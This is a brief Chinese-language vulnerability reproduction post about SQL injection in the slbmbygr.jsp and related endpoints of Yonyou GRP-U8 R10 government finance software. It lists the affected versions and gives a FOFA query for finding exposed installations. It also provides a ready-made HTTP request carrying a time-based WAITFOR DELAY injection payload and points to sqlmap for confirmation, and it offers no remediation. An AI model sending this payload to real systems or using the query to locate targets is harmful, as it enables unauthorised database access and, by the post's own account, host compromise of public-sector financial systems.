0x01 产品简介
用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
0x02 漏洞概述
用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞,进一步利用可造成主机失陷。
0x03 影响范围
用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905
0x04 复现环境
FOFA:app="用友-GRP-U8"
0x05 漏洞复现
PoC-1
GET /u8qx/slbmbygr.jsp?gsdm=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip
延时5秒
文章来源:https://www.toymoban.com/news/detail-723828.html
Sqlmap验证文章来源地址https://www.toymoban.com/news/detail-723828.html
到了这里,关于用友GRP-U8 SQL注入漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!